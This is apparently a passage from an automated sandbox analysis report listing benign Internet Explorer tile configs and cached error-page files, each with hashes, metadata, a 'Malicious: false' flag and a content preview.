Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x48330f3c,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.1405293489180375
Encrypted:	false
SSDEEP:	12:TMHdNMNxxwWubmWubpnWimI002EtM3MHdNMNxxwWubmW2vnWimI00Ob6Kq5EtMb:2d6Nx9uISZHKd6Nx9ucSZ7ob
MD5:	F10D9015D97537E4CC5CA07F9145B361
SHA1:	87D64C880746B28A387A235D0C452AD04695606A
SHA-256:	6A4B68122EAAAD5791D23E9EBB567BFEDECE7E59678C06927B79806494D7BE71
SHA-512:	3402E6938902C99946EB10A06B7F3F7096DAA26BC6A102948F8BD94A66A7801E136773FE28958C25FA4782A4C0ACA676BDD560EE540A38669073A80FDDC0213A
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x48330f3c,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.151946553913353
Encrypted:	false
SSDEEP:	12:TMHdNMNxcwaraUnWimI002EtM3MHdNMNxcwaraUnWimI00ObVEtMb:2d6NxEWUSZHKd6NxEWUSZ7Db
MD5:	C7A54905E71A510F14BCF92F140F4B33
SHA1:	EF490F8F776D5EC96F24A812857189DCBB22E26C
SHA-256:	700B1C3E36713F75D4780CF4C6B26E96E4FC9C0FE5DABE2E500A8E6DF0DC3D3E
SHA-512:	3F3A6788B5AA51FFF8655081378F6337CA4F0B56FA69BE12DB86FC938D3578DE51ECBB2C2064A6E7E4F6DE4ED3A70EC7E6E4DF19B2A2488D8EDC3FEBEB0CBE39
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x482e4b07,0x01d6e951</date><accdate>0x482e4b07,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.098166801838891
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnwWubmWubpnWimI002EtM3MHdNMNxfnwWubmWubpnWimI00Obe5EtMb:2d6NxruISZHKd6NxruISZ7ijb
MD5:	55EA94A0B770ACED3BB3C2E5E706F369
SHA1:	985BB78AC79E5CB7A82A3063C43B690C5C9F897C
SHA-256:	0F222996F521DB45250C4E5DC59ADD173AEE6A22B223D50AE850057883A9679A
SHA-512:	0DB107D21BEC4550AE97540E12152C33AE1EA4D93681D2F6976FF4235C69C88D57ECF4523F3DF84D2725913403ABCAB83299EE9BCDB5733E07C32B8347213A83
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x4830ad7a,0x01d6e951</date><accdate>0x4830ad7a,0x01d6e951</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
IE Cache URL:	res://ieframe.dll/NewErrorPageTemplate.css
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
IE Cache URL:	res://ieframe.dll/down.png
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
IE Cache URL:	res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9002
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
IE Cache URL:	res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9003
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
